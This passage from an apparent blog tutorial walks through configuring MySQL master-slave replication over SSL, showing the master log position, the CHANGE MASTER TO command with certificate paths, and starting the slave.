Query OK, 0 rows affected (0.00 sec)</pre><hr align="center" color="blue" width="100%" /><br />
If the slave already has data from the master, then you may want to copy over the data manually to simplify things, as described in <a href="http://dev.mysql.com/doc/refman/5.0/en/replication-howto-rawdata.html" target="_blank">16.1.1.6. Creating a Data Snapshot Using Raw Data Files</a>. However, you can also use mysqldump, as shown in <a href="http://dev.mysql.com/doc/refman/5.0/en/replication-howto-mysqldump.html" target="_blank">Section 16.1.1.5, “Creating a Data Snapshot Using mysqldump”</a>.<br />
<br />
Once the data is copied over to the slave, I get the current log position.<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>mysql> SHOW MASTER STATUS;
+------------------+----------+--------------+------------------+
| File | Position | Binlog_Do_DB | Binlog_Ignore_DB |
+------------------+----------+--------------+------------------+
| mysql-bin.000002 | 16524487 | | |
+------------------+----------+--------------+------------------+
1 row in set (0.00 sec)
mysql> UNLOCK TABLES;</pre><hr align="center" color="blue" width="100%" /><a href="http://dev.mysql.com/doc/refman/5.0/en/replication-howto-slaveinit.html" target="_blank"><br />
16.1.1.10. Setting the Master Configuration on the Slave</a><br />
Finally, configure the slave. The log file and log position tell the slave where to begin replication. All changes after that log position will be replicated to the slave.<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>mysql> CHANGE MASTER TO
-> MASTER_HOST='192.168.1.50',
-> MASTER_USER='repl',
-> MASTER_PASSWORD='replication_password',
-> MASTER_LOG_FILE='mysql-bin.000002',
-> MASTER_LOG_POS=16524487,
-> MASTER_SSL=1,
-> MASTER_SSL_CA = '/etc/mysql/openssl/mysql-ca-cert.pem',
-> MASTER_SSL_CAPATH='/etc/mysql/openssl/',
-> MASTER_SSL_CERT = '/etc/mysql/openssl/mysql-server-cert.pem',
-> MASTER_SSL_KEY = '/etc/mysql/openssl/mysql-server-key.pem';
Query OK, 0 rows affected (0.74 sec)
mysql> START SLAVE;</pre><hr align="center" style="color: blue;" width="100%" /><br />
Replication can start!<br />
The slave status can be checked via the following command:<br />
<br />
<hr align="center" style="color: blue;" width="100%" /><pre>mysql> show slave status;</pre><hr align="center" style="color: blue;" width="100%" />